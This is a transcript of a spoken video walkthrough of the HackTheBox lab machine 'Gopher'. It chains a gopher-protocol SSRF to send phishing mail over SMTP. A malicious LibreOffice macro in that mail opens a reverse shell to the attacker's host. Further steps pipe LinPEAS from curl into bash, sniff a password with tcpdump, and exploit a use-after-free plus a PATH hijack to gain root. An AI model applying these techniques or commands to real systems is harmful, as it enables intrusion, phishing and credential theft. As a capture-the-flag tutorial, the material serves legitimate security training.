What's going on YouTube? This is IPSEC. I'm doing Gopher from HackTheBox, which has three main components. The first one is a server-side request forgery, and when playing with it, you discover that you can use the Gopher protocol, which just lets you write to raw sockets. So you can use that SSRF to talk to an SMTP port and send mail to users. You send a malicious open office document to a user with a macro, they run it, you get a shell on the box, and then with that shell, you discover that TCPDump has a capability that allows any user to sniff packets. So you can set that up on port 80 and discover a user sending their password to the web server. When you log in as that user on the box, you can discover they can run a notes binary that has a use after free vulnerability, which sounds really scary, but it's a super beginner way they implemented it. So it should be easy to understand exactly what's going on. With that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, bring the nmap directory and call it gopher, then the IP address of 10.10.11.225. This can take some time to run, so I've already ran it. Looking at the results, we have 5 ports open, it looks like. The first one being SSH on port 22, and its banner tells us it's a Debian server. We also have, well, a filtered port 25 on SMTP, so there's probably a firewall or something blocking SMTP. So looks like only 4 ports open, not 5. But we do have HTTP on port 80. That's running Apache. We also have 139 and 445 open, which is running Samba SMBD. We know it's not Windows just because it says Samba here, so it's running the Linux client. I'm going to start off with just looking at the website. So 10.10.11.225. And it directs us to gopher.htb. So let's add that to a host file. We can do 10.10.11.225. And then gopher.htb. I think it had an F instead of a PH. It did. Refresh. And now we get the page. So this looks like a just static page. I don't see anything where we can send data. We have a few usernames like Jeff Davis, people, not usernames. This is Jocelyn Hudson, Tom Buckley, and Amanda Blake. And then we have a contact form. So I'm just going to test this out. We'll do ipsec root at ipsec.rocks, test password, and let's go and intercept this request. Send it to Burp Suite. Proxy intercept is on. Send message, and it looks like this form just doesn't work. It says form action property not set, so I'm not even going to bother looking at that anymore. What we want to do is identify like what this site's built with. Is it just a static site? We see this is a bootstrap thing. The web page also said they were bootstrap developers to make websites, so this looks very much static. The site icon is also a bootstrap one. We could try like index.php, we get not found. We could do like index.html, and we get something here. We could try just the defaults like /admin, see if there's an admin portal or whatnot. Don't have anything. So I'm going to go look at SMB, but before I do, let's set up a gobuster. I'm going to look for subdomains. So we'll do gobuster vhost -url http gopher.htb word list op seclist discovery DNS subdomains top million. Sure, we'll call this subdomains. And the reason why I'm doing subdomains instead of just gobusting directories and files, generally when I get a static site on HTTP, I go for subdomains first. I normally don't do both at the same time because that can create some latency. We have a error somewhere. Unable to connect RL. Where is that? Oh, it's probably just -u. There we go. And we have a lot of redirects. So let's see, we can do -h. Let's see. I'm going to run this again, cancel real quick. I was hoping it would have response codes. Let's see. That's global. This is special method. How do I just say ignore 302s? I don't see that. So what I'm going to do is just do -o for out file. I'll call this gobuster.vhost. And that should be fine. There we go. And then I can just cat the file and grep through later. Let's see. We said we're going to look at SMB. So I'm going to do SMB client -L 10.10.11.225. If I can type. And we can see there is a shares directory. We could have also ran like crackmap exec probably if we wanted to. What is it? CME SMB 10.10.11.225. Let's see. Is that the correct syntax? It is. And then is it --shares? Let's see. -u. Let's do like a null authentication. Oddly enough, its banner says Windows 6.1 build 0. But you can see crackmap exec can do it as well. But I'm going to use SMB client again, and then let's access the shares. So 10.10.11.225/shares. Just hit enter for the password. And it looks like there is a directory.backup. And then we have mail. So I'm going to get mail to download it. And if I cat mail, we can see some email. We have jdavis@gopher.htb, so it's leaking the username schema. TBuckley, so it's first initial, last name. And it says, our dear Jocelyn received another phishing attempt, yada, yada, yada. And then at the end of it, it's talking about last thing for Tom. We should do something about our web proxy and restricting access. And oddly enough, he's saying like you should restrict access using the limit. If we go like in Apache's config, so Apache limit directive, I think would pull it. And I'm saying Apache because I'm pretty sure nmap said it was Apache. Cat nmap gopher nmap. Let's see. Apache. So if we look at the limit directive, we can see it's limit, and then you put HTTP methods. So this is how you can require a valid user for these. I say it's an odd way to do it because generally speaking, you would just do a directory. So you just say like, or the whole vhost. There's a lot of other ways you can do it where you don't have to specify HTTP methods. So let's leave this knowledge in a back pocket because we don't know where the web proxy is, but we should fuzz for methods when we do find it, right? And that vhost is still going. Let's see. If I cat gobuster.vhost, okay. So let's do a grep-v 301 and I'll end the parentheses. So like that. And we do find 1401, and that is proxy.gofer.htb. So let's add this to our host file. So sudo vi etc host. And we'll add proxy.gofer.htb. If we go to proxy.gofer.htb, I did HTTPS, let's do HTTP. We get a username thing. So I'm going to try like admin. Can't really guess it. So let's now send this over to Burp Suite. Intercept is on. Send the request to repeater. And when we get it, we get a 401 unauthorized. Remember, they said they were going to restrict access via limit, and limit requires you to specify HTTP methods. We can try post. We don't get anything. Let's try just a file. Let's do index. Unauthorized, we can do post, and we get a 404 not found. So if we specify a file and also the post, or probably any method, if we don't do a get method, it then returns a 404 page. So let us go back to gobuster, and we can stop this subdomain brute forcing, and we can do gobuster directory, and then -M for method, I think. Let's do -h real quick so I make sure. No, it is lowercase m for method. We can say post, and then U, HTTP proxy.gofer.htb, word list, op, sec list, discovery, web content, raf small words.text. And I'm going to add the extension PHP. The only reason is I need to brute force file names, and almost any other web server like Python, Ruby, whatever, they're not going to have extensions. They're going to do better handling of it. PHP is kind of one of the oddities. I guess we could do Perl if it's a CGI bin, or maybe like .html, but if it's .html, it's going to be static and can't be used for a proxy. So that's my logic why I only specify PHP here. And we do see there is a index.php. So let's do a post on index.php, and we get missing URL parameter. So let me do get, let's just convert request, because if I convert request, it has this content type for me. Then we can say URL is equal to test, and it still says it's missing the URL parameter. So what I'm going to do is make this, we can probably leave the content type there. That's probably not needed. But just because we're doing a post request doesn't mean we can't put parameters in the get portion. So if we do URL test, it is now hanging. So let's do HTTP 10.10.14.8. I probably should cancel that request. And we can say NC LVNP 9001. Let's listen, try to connect there. We send a post and we can see it connects. So it's connected from 10.10.11.225. So we know we can make this server make a request to us. Now, that doesn't really help us any, right? Because we have like a server-side request forgery, but I don't know of any way to really exploit that. So the very first thing I'm going to do is try to get a file off the server, right? So if I do file, I don't know why I just typed FTP, etc passwd. And we get blacklisted keyword file. We could try maybe a PHP filter. So PHP : / filter convert dot base 64 encode resource is equal to blacklisted keyword PHP. Let's see. We could just look at a bunch of URLs. So is it? I think it's protocols. libcurl protocols PHP. And I'm doing libcurl specifically because I just assume this is going to be using libcurl. Let's see. PHP libcurl protocols. So HTTP, HTTPS, FTP, Gopher, Telnet, Dict, File, LDAP. The Gopher one is most interesting to me, and since the box's name is Gopher, I mean, that's a pretty big hint. And I'm going to try Gopher : / and then 10.10.14.8 9001. Send this. And let's see, are we listening on this? I am not. Let's do NCLVMP 9001. We send it, and we get a connection. Now, there was a huge difference between this connection that we got, and let's change this back to HTTP. This one. Because libcurl will automatically add all these headers, it makes it hard for us to communicate to any socket, right? But since Gopher doesn't put anything here, we can just write in that request, right? So if I do, let's put this back to Gopher, and then after this, I can say, please subscribe. It's probably got to be %20. And we can see it writes. Now, we need to put a character after the slash. It can be anything we want. And the only reason we're doing that is because we see it's removing the very first character. So if I put a question mark there, so it's more URL friendly, we see please subscribe, but it can literally be anything, I believe. So let's do another slash. Bad request. Let's do A. Wait, what? I guess it's because we have the %20 in there. I don't know why it's... Oh, I hit enter. There we go. I could tell because I saw this 2 there, so I knew it was a new line. I don't know when I did that. So we can try the 2 slashes, %20, and see it also says please subscribe. So since we can write just to a socket, that means we can probably connect to other plain text protocol things on this box, right? And I say plain text protocol because if it's going to be SSL, we can't really forge the handshake that it uses. So we're limited to just whatever's communicating over plain text. I know port 22 isn't plain text, but like the banner, if I do NC 10.10.11.225.22, this does get sent unencrypted, right? And then we do a handshake. So let's test this out. Let's do 10.10.11.225. And we have this. So let's try port 25, was it? Was 25 the one that was filtered? Cat, nmap, gopher. 25 is filtered. And it's just going to hang. Now, there is something interesting going on that I only noticed after talking to people, is 127.0.0.1 is blacklisted also, as well as localhost. My first thought was to use the box's IP address, which works. You could also get around that by encoding the IP address. So like 127 in hex is equal to 7F. So if I did ping 0x, then 7F, 000001. So this is each octet encoded in hex. It pings localhost. So that's another way you could get around this filter. 7F 23. And port 25 is hanging. So what that means is we probably have to send it some type of data. I think if we just do 0D, 0A, which is a line break, and then we encode it, will that get us anything? Maybe send, oh, we need an extra character there. Let's see, do we have to do 2? Let's see. I guess we just have to make that whole mail request real quick. I don't know what's slowing it down there. If we wanted to, we could also go over to fuff and fuzz for other ports. So if we copy this and do a fuff and then -u, we need to put the URL. So HTTP 10.10.11.225. Oh no, this is proxy.gofer. And then I'm going to fuzz the port like that. And then we do the word list. I'm going to do this fancy redirect, which is going to build a file and use that file in memory. So we do that. And then we want to probably filter size for 462. Oh, this is all 401s. We need to change the method, and that's a capital M and fuff. It's not. Capital X. There we go, status 200. So now we can filter size for 32 because that's the size of a request that doesn't have anything. And eventually we will see things. I would guess, yep, 22 is there. There's another way we could enumerate ports in case like it's not echoing any data back to us. If we look at the request, I'm hitting the request a few times. You see it's always probably over like 105 milliseconds. If we do a port that doesn't have anything, it's going to be like under 100 milliseconds, right? Because there's no action going on. If we do 80, I I guess it's waiting for a response and it will eventually time out. So we need to, in FUF, look at timeouts probably to do this much better because port 80 is hanging as well. Let's see. If we do get %20 slash %20 HTTP 11 0D0A, which is a line break, I believe. URL encode this twice. At least we get bad request. Let's see if we do it to a bad port. Okay, so now that works. 22. We still see something. 25. That one hangs. But you can see how we're kind of forging something, right? I think we need probably multiple line breaks here, and maybe we need like a host header and some other headers. But you can see we're just arraying to it. Real quick, if I do 10, 10, 14, 8 on 8000, we can see what we wrote, right? So enough just skipping around. Let's now try to send an email. So what I'm going to do is let's just open a new pane and create our mail file. So the first thing we have to start out is a hello command, and it doesn't really matter what we put after it. It's just got to be something. And then we do mail from. This can be an email address. So I'll try my own. And then we say who the recipient is. And let's see. It looks like Jocelyn. If we go to the site, let's see, where was the users? Hudson. So probably jhudson's the user. So we'll do jhudson at gopher.htb. Then we need the subject, and we'll say review document. And then we can do the message. And we can say, please check out the document here. HTTP 10.10.14.8 8000. I'll call it malicious ODT. Let's make this a link. Okay. Actually, I don't think a link's going to work because we're not in like rich text format or something. So let's just do that. And then when you're done writing the body, you just do a period, and then we can quit. Okay. So if I cat mail.txt, we have this. Let's copy this all. I'm going to go to Burp Suite. Let's see. If we convert selection, URL, all characters, twice. So let's double encode everything real quick. Let's paste it here. And before I send it to the user, I'm going to test it against myself real quick. 10.10.14.8. I can leave it on port 25. Let's just do sudo nc lvnp 25. Send it. And we get everything we wanted. The hello server, mail from, receipt to, a recipient to. So that looks good. So let's just see if she opens any documents. So first I'm going to Python 3m HTTP server. We're listening on port 8000. So 10.10.11.225. We sent it. And the whole reason I was doing OpenOffice is because it does say use ODT format here, right? As Microsoft Office doesn't always interpret documents from it. So we sent the request. We don't have a response. I'm expecting a response. Let's do 0D 0A. It's now just hanging. We did in hex, let's see, 0x7f. Okay. So we need to do the IP and hex. We can't just do 10, 10, 11. 0D, 0A. Let's get rid of one of those line breaks because it's got an error. It says, I can break rules too. Goodbye. So we did something wrong. Let's see, v mail.text. Telnet SMTP message. What did we mess up? So hello, mail from. I wonder if we have to put brackets. Oh, do I have data? I don't. So receipt 2, data, subject. This is a test message. Okay. Is that how it goes? Let's copy this. And we can double encode it. Let's see. Convert selection, URL, all, Control U. There we go. Okay. So that looks better. So we make the request and it says queued and goodbye. Now if I did 10, 10, 11, 2, 2, 5, it still just hangs. So it only works if we did localhost. So when I talked about the whole evading thing, you do have to do it. You can encode the IP that way. There's probably a few other ways we could do it, but I think hex is the easiest. So now that we've sent that, we should just wait. And I'm going to just wait 2 minutes and, oh, I don't even have to. So we see the server making a GET request to us. So let's now create a LibreOffice document. So let's do file, new, text document, and then tools, macros, edit. I'm going to click on my document here to create a macro on this document. Is this new? That's not what I wanted. Let's see. Am I in? I'm worried I'm in this. We need to make sure we're in this macro. Let's do shell save. I'm definitely in that. Let's see, file, new. Select macro, new. There we go. Now we have a macro on the document. And since that font's small and it's not making it bigger, I'm going to type it here. We're just going to do shell and then --c --i dev TCP 10 10 14 8 9001 0 and 1 like that. Let's see, there we go. So this should be a good macro. We can copy it, paste it here, and then save it. And let's save to IPsec HTB. Then the box is gopher, and we called it malicious.odt. Save. And there's one more step we have to do. So let's go to Tools, Macros, Organize, Basic, and then go find our macro, make sure it's under a document, click Assign, go to the Events, and then Open Document, and then assign that macro. And then you want to make sure it's saved in malicious.odt. If you save it in LibreOffice, it saves in like your template document, which only executes on your machine. We want to make sure it's saved on the actual document. If I click Run, let's see. It says connection refused. So let's try that again real quick. Let's go Tools, Macros, Malicious, Run, and we can see we do get a shell. So we can exit this. We can save before exiting. And hopefully, if we send it to the user, we will get a shell back. Let's make dir dub, go in there, move the malicious here, HTTP server, okay, send the request, and we have to change to the IP of 0x7f123. There we go. So that is now queued, and we just wait for the user to open it. It can probably take up to 2 minutes, so I'm going to just set a timer here, sleep 120, and then we will resume the video. As I started saying it again, we see they grabbed the document and we got a shell. So let's now Python 3-c import pty spawn bin bash stty raw minus echo foreground export term is equal to x term, so we can clear the screen. So now we have a shell as jhudson. Oddly enough, we are located in user bin. I expect it to be in the user's home directory. Let's just look at etc passwd and grep for jhudson, and we can see the home directory is indeed home jhudson. We can just look at every user that has a shell. Whoops, I did that the wrong way. sh $. And we can see there's a few other users: root, jhudson, jdavis, TBuckley, and a Blake. If I go in my home directory, we can see a users.txt and then downloads. And downloads looks like it's chmodded to 777, but there's nothing in it. So the very first thing I generally check is if I can sudo, and not found. It looks like our path is set oddly. We only have user bin and bin. There's a lot of other directories. So like if I echo path on my machine, we can see I have my home.local bin. Sandbox probably wouldn't be on that box. User local bin. There's like user s bin. There's a bunch of other bin directories, right? So let's just get a proper shell. So I'm going to make dir ssh, and we'll ssh into the box just to see if that fixes up my path. So let's do ssh keygen -f jhudson cat id jhudson.pub. And I probably should just name this gopher and use the same SSH key for every user. But I generally name my SSH keys the user because I'll forget what it goes to, right? So let's do v authorized keys. Type that correctly. Paste. chmod 600 sh-i jhudson at 10.10.11.225. Accept the key. Echo path. And our path is set a little bit better. I wonder if I could have just done like bash. Echo path. Yeah, I didn't think that would work because a reverse shell executed bash. There's probably a way to reset the environment variables that I'm just forgetting about. But now we have a proper session. It's still not found. Find /-name sudo pipe errors to dev null. user sbin. So sudo just isn't here, I guess. Maybe I did the dash name wrong. Let's hide errors. Grep sudo. Yeah, I don't see a sudo in bash, which is definitely odd. We have the bash completions, but it looks like sudo was just removed from this box. I bet if we cat etc. Nope, there is no etc sudoers. So, okay. Not sure exactly what's going on, but let's just run LinPEAS, right? It's odd that admins remove sudo, but not completely out of the ordinary. So opt-peas, LinPEAS. Let's start up our web server again. And then I'm going to go in dev shm because I'm going to actually log the output of LinPEAS this time. So we'll do Python 3, curl 10.10.14.8, 8000 linpeas.sh, pipe it over to bash, and then we'll do a t linpeas.out. And T will just allow it to write to the screen while also writing to a file, right? And you'll see why I want to write to a file later, because it just makes searching this a little bit easier. Not that much easier, because we could just use like our tmuck session and search around, but I like using grep, right? So I'm going to pause the video, let LinPEAS finish, and then we will resume. And now that LinPEAS is done, we can go over it. So I'm just going to search my history for curlers because that gets us to the top of LinPEAS output. And then let's see, we have basic information, operating system. We can see it is a Debian bullseye box, and then the path. So if anything in this LinPEAS doesn't work as expected, check the path because you probably forgot to update it. And I'm going to just copy this so I can search it, and I can easily jump down to everything I want to look at, right? So I normally skip Linux exploit suggester. We have container. Let's look at processes, just see if anything sticks out. data has a lot. We could see me running LinPEAS right here. SMBD, that's running. Postfix, that's running. There's my reverse shell. So nothing too interesting there. Files open by process belonging to other users, credentials in memory, cron jobs. This is always good to look at. Everything looks standard. I don't know if there's a Samba cron by default. I normally don't see Samba on Linux boxes, so let's just look at that. I think it was in cron daily. If we cat Samba, this looks good, and it's also cron daily, so that wouldn't be really a vector here because you have to wait 24 hours, and that would be just infuriating. System timers, very much like crons. Nothing looks out of the ordinary there. Socket files, Unix sockets, enumerating that would just take really long. So again, that's like Linux exploit suggester. Come back to it when we don't really have anything. We have etc host there. Active ports. We can see SMTP is only listening on 25. So this is why when we tried to use Burp Suite and use the routable IP of 10.10.11.225, we didn't get anywhere. I'm kind of surprised that it didn't like just close the socket right away. Like the Burp Suite window hung. I'm not sure exactly why. That's probably because of the IP tables rule now that I think of it, because IP table nmap, when we first ran this box, said port 25 was filtered, which means it was probably a drop, not a reject. By default, Linux will just reject if it's not listening. So since port 25 was probably set to drop on all interfaces, when my Burp Suite hit 10.10.11.225, and it didn't do anything, that's because IP tables dropped the packet, so it never sent me the reject. So my web browser just hung waiting for the acknowledgement to come back. That's probably exactly what happened. Sudo doesn't exist on the box. All users log in now. Last login. Doesn't look anything interesting. Useful software on the box, compilers. Let's see. We had the Apache config. And right here, it is using the directory. I don't think they need the limit get at all. I think the auth type, auth name, and stuff was valid under directory. And it would put the password, which is in the htpasswd file. as that's the very next thing. Analyzing it, we see TBuckley. I'm not going to waste time and try to crack this. I normally would, but I know this is not a crackable hash. You just use hashcat. I have 100 videos on that. So let's just skip over that. We have PAM auth files. Everything looks standard there. Let's see. What is the next thing I want? SMB files. We could just look at it. It's just enabling guest. And everything that's running command is commented out. Interesting permissions. So this is always a good one. And we have user local bin notes. So let's look at that. If we try to execute it, we have permission denied because only members of dev can execute it. We have the root user and then the dev permissions. I'm guessing that's, let's see. I don't know why it says S. It's probably just a special permission bit that's set. But it is probably set UID. So if we're a member of the dev group, we would be able to access that. So let's cat etc group, grep for dev, and we can see TBuckley is a member of that. So let's go to dev shm, grep LinPEAS output for TBuckley, and see if we can easily get to them. Let's see. This hash, so again, normally would try cracking that, but it is a dead end, and there's nothing else we can do with that. So let's just keep going down this list to see if there's anything else special. Misconfigurations on ld.so. We do have TCPDump has capnet admin, and what that allows us to do is any user that can execute TCPDump can now dump packets because of this capability. So let us try this out. So if I do TCPDump, I can probably do -i any. So what do we want to dump? If I do like port 22, my dump file is going to get huge, right? So I'm going to say, let's do port 80, I guess. We'll do -i any port 80. And if this doesn't get anything, then I do like 445 and 25. We could probably also do like port not 22, but let's do that. And I do want to say -write output file. We'll say 80.cap. And I'm also going to do, is it -s0 to capture the entire packet? I think so. So let that go while we get to the end of this. Scripts, nothing interesting. Home directories we've already looked at. Interesting files. I don't know what those are. And it doesn't look like we really have anything else. So let's see. Do we have anything on that? There is stuff. If I do strings against it, we can see HTTP page. We haven't got the page. So this is definitely someone hitting it. Let's see. Strings grep proxy. So someone is hitting that. We can do -a5 for after 5, and we get the authorization header. I'm going to download this capture in just a minute so we can see it in Wireshark, but this is a quick way to do it, and we can get TBuckley's password. We can try switching over to it, so su-tbuckley, put in the password, and we get logged in. So this now lets us access that user local bin notes directory. But I want to download this capture so we can just open up in Wireshark. So let's do, let's see, sep-i jhudson.pub. Oh no, jhudson is right. And then jhudson at 10.10.11.225 dev shm 80.cap. And we can Wireshark it to see exactly what's going on. And my Wireshark font is super small. Is that just like edit, preferences, layout, Font and colors. Let's do this. That should be fine. Okay. I wish this was in dark mode. Is there a quick way to do it? Appearance. No. Layout. I know there is, but oh well. So, I do not like how big this font is. It's going to mess me up. Let's change that to 25. There we go. That looks better. So I'm going to filter for HTTP, and we can see there's a few streams. This is kind of getting truncated off, but if we follow HTTP stream, we can easily see it. So we have a GET request loading gopher.htb, and then the headers here. And if we look at all the streams, I think they're all the same, right? This is a get slash. After that, this is probably the proxy hitting it. So we make a request to the proxy, and then the proxy hits it. So that's all this is. If we look at this stream, it's probably not going to have that header because this is the proxy code reaching out to it. So let's follow. Yep. So, okay. Now that we have that, let's get on the TBuckley user, and we'll save this password. So vcreds.txt, paste it in, su-t Buckley, copy, paste. And then the first thing I'm going to do is a sudo -l. Well, sudo's doesn't exist. So we can do execute user local bin notes now. And we get a menu. And if you do a lot of CTFs with just use after free or heap challenges, this menu probably looks familiar. It's just reused in a lot of beginners, where you can create two pieces of information. We can create a user and a note. We can show a user information, delete our user. We can also show a note and delete a note, right? So if I do one ipsec, we can show the user information. My username's ipsec, the role is user. Let's write a note, please subscribe. We can show a note. We see the note is subscribe. Oddly enough, please is not there. I wonder if, let's see, 5 show a note, please. Okay, so it's doing something weird with spaces. Okay, doesn't really matter. But we can see we have notes and users still. Now, what I'm going to do is we can create a user. We can do ipsec. I'm going to then delete my user. Then I'm going to create a note and then put a bunch of A's in there. That looks fine. Now we're going to show the user information, and we see we overfilled and went username and role. And overfilled is probably a wrong word because it makes you think we went to like a buffer overflow. And there's nothing happening on the stack here. And if you're confused, I am going to copy the binary down. We'll open up in Ghidra and examine it, right? But I just want to show kind of how I did it. We can look at a note. It is A's as well. So what I'm going to do is we'll exit. I'm going to run it again. I'm going to create a user. Doesn't matter what it is. We're going to delete. And then we're going to write a note and guess the number of A's. It's probably going to be an increment of 8. So let's try 16. And then the role of please sub. Like that. So now I'm going to show user information, and we see my username, and then the role now is set to please subscribe. I think I didn't show the backup notes function, and we just have access denied. We don't have admin. But if we had set a role to admin, then the backup note function would think we're an admin, right? So now that like we've done a lot of magic, let's explain exactly what's going on in the binary. Let's just go to dev shm, cp user local bin, notes here, Python 3, HTTP server. And then we can wget 10, 10, 11, 225, 8000, note. Notes? There we go. It is notes. So I'm going to open up Ghidra. And then we will examine this binary. And then we'll step through it in GDB to really show what is going on. Let's import. Import. There we go. Notes. Sure. Analyze. Yep. Okay. So exports. Main. And here's all the decompiled code. So we have the menu here. We have case 1, and then it's going to malloc 40 bytes or malloc some memory over to local 10. I always hate being too specific, right? But local 10, if we look, Ghidra is really annoying at this. I don't like how it just says local _ 10. And then if I highlight over, this actually isn't the stack minus 10 is also misleading. I don't know. When we go through in GDB, why I don't like this local 10 will make more sense, right? But this is going to be the pointer to where the username is stored. So whatever address this gives us, that's where the username is stored. And if we go to this one, case 4, this is where we're creating the note. The pointer to where it's stored is here. We're just assigning memory, right? So if we look at the user, we only see it using a free on local 10. And what that does is erase the data or free up the memory where that memory was, right? It doesn't actually unset the pointer. We would need to do like local 10 equals null to unset the pointer here. And because the pointer is not unset, so what's happening is we say we want memory. We want 20, let's just say this 28 bytes. We want 28 bytes of memory. It's going to go, okay. It's going to look at the heap and say the first available chunks are at this address. And then when we delete the memory, we delete those chunks. So when we do malloc for the second time with the notes, it's going to give us the same address it gave us for the username. And we just put data there, and whatever we're putting there is what now is pointed to also the username. If that doesn't make sense, we'll step through in GDB in just a second. And we can see, let's see. Where does it start adding the role? So we assign this much memory, then we do memset. And let's see. Let's just step through a memory. That'll be a bit easier. So I'm going to chmod plus x notes, GDB on notes. And now I'm going to break main. We can run. And we want to set 2 breakpoints. We want to set a breakpoint on 27D, because that's going to be where we move the pointer into memory. And RAX gets moved to RBP plus 10, or that's local 10. So let's set a breakpoint. What did I say, 27D? Yep. And then we want to set a breakpoint for the other malloc, right? So here we'll do breakpoint right after malloc 39E. So breakpoint 39E. So we'll continue. Let's create our username. We'll do IPsec. Actually, before we do put a username, let's look at what RAX is. So I'll do IR for info register RAX. And this is the pointer. So when we type IPsec, this pointer is going to be the pointer to where IPsec is stored in memory. So let's just do this. User. So I'm going to take a note there. So I'll continue. We'll type IPsec. And let's create a note. Write a note. And we could x/s on that pointer real quick, and we see that is indeed IPsec, right? So the next memory is going to be an RBP minus 10. If we look at here, before it was RBP minus 0x8. So REX is where the pointer is, but when we leave it, we put it onto RBP for like long-term storage, right? So let's now do an IR RAX, and we see that pointer is a F0. So this will be note. And this is behaving as we expect, right? If we do please subscribe, that looks good. We can show user and show a note, right? So I'm going to rerun the application, and we're going to do it again, but in the slightly different order of creating user, deleting the pointer, freeing the memory, and then creating the note, right? So do IR RAX. It is still set to AC0 because we executed the program with GDB, which will disable ASLR, so that's why all the memory is the same. So let us put IPsec here, and then we're going to delete the note, or delete the user. We're going to write the note. We're going to do an IR on RAX, and now we see it is AC0 again. So the first user was that, and now note is also this. And if we do x/s on that address, it's blank right now, I hope, because we freed the memory. Yes, it is blank. Remember we did that the last time we ran the program, and that said IPsec when we were right here? Now it is blank because, again, we freed up the memory. But because we didn't unset the pointer, it still pointed to this spot in memory. So now when I continue and we put 1, 2, 3, 4, 1, 2, 3, 4, we'll put 24 A's. I think I said 16 before, but it's 24. And we'll say admin. Now when we show user information, it says we are admin. And now if I went to backup notes, we could see it did a few things. And we see it running tar. So the last step of the puzzle is to see what that admin function is. And we see it's running tar, but it's not using the full path. And since this is a set UID binary, not sudo, we can change a path variable and put tar like in the current working directory and do a path hijack. So let's do that. So let's do echo path. We have the path here. Let's do export, whoops. Export path is equal to pwd, which is a current working directory. So now when I look at path, it's dev.shm. If I execute tar right now, it's going to use the tar out of user bin, right? But now if I create a new tar, and this is just going to run bash, because my path has dev.shm up at the top, when I run which tar, it's going to execute that, which is just a bash shell. That's odd. Which tar definitely did show it, but when I ran tar, it did not. That ran. That's weird. But I think when I run the program, it'll drop me into a shell. So let's test this out. Let's call notes. We'll create a user, IPsec. Then we want to delete IPsec. We write a note. We need 24 A's. Okay. And then we just say admin. So now when I show user information, our role is admin. I click backup notes. And it executed as TBuckley. I guess because there's no set UID call. So we probably have to make a C program to do this. Do we have GCC on this box? We do. So let us remove tar, and we will create shell.c, I guess. And then let's just do int main void set UID 0 and system bin bash. Oh, I probably need the dash p. That's probably why it didn't work before. GCC shell. That looks like it works. Move a.out to tar. Let's see. 1, 2, 3, 4. 1, 2, 3, 4. That's all the A's I need. Let's try this again. We'll execute notes. We will create a user, delete 1, 2, 3, admin. I should just copy this on my clipboard now. Backup notes. We are still just TBuckley. I think we're missing one step. Let's see. I bet it's a weird permission on dev.shm, and since it's my working directory, let's see. Yeah, dev.shm has NOSUID, so I wonder if that is what's doing it. Let's go to temp. Let's make sure temp doesn't have NOSUID, right? Let's see. I don't see amount on /temp, so that would just be going back to /, and that will be have SUID. Okay. So let's do tar bin bash. We'll call it bash-p. And if it doesn't work with bash, I'll copy my small C program I just put here, right? Echo, let's copy all those A's. Echo path, export path is equal to this. We'll remove dev.shm and put temp. So now when we run which tar, we get temp tar. Okay. So I'm going to run notes again. And I'm going to copy all these. So I set my thing to admin, create a user, delete a user, write a note. We can show. That looks good. Hit 8. And there we go. We are root. So it's because I was in dev.shm. Weird problem. But we can go to root and get root.txt. So hopefully that all made sense. Again, when we freed this, if you don't understand what happened, where is the free? We copy this. This is only deleting the data where local 10 existed. So you would need to do like local 10 is equal to null as well to unset that pointer. Because again, it's pointed to that spot in memory. And whenever we run malloc, it's going to give us the first available. And since we freed it, it's saying wherever the user was pointed to is now free. So you are free to use that spot in memory for your note. And when we do, we now have the user pointed to the same spot we were able to write, which is our note. I bet if we look at this, I can make more sense of how we know the role. So 18 is going to be 24. So this mem set is going to be setting the username, and that's going to use the rest of the space we allocated hex 28. So it's going to use hex 10 more for the role assignment, right? That's just the user's pretty much a structure in memory, and it says there is 24 bytes for the user and 10 bytes for the or 16 bytes probably for the role. So hopefully that all makes sense. So that is going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next week.